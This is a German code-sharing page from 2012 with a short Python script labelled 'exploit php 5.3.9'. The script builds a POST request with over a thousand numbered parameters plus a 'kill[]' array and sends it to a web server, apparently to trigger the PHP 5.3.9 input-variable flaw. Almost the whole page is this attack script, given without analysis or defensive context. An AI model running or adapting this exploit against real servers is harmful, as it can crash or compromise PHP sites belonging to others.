» Eintrag anzeigen
|
Autor: PFault Sprache: Python Erstellt am 11:47 - 03.02.2012
|
|
| Administration | Sie sind nicht der Autor dieses Eintrags. |
| Beschreibung: | exploit php 5.3.9 |
|
1
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #!/usr/bin/python
import urllib,urllib2
url = 'http://arthur/frames.html'
i=0
baddata=""
for i in range(0,1001,1):
baddata=baddata+str(i)+"=1&"
baddata=baddata+"kill[]=kill"
request = urllib2.Request(url, baddata)
request.add_header('Content-Type', 'application/x-www-form-urlencoded')
request.add_header('Content-Length', len(baddata))
response = urllib2.urlopen(request)
page = response.read(200000) |
|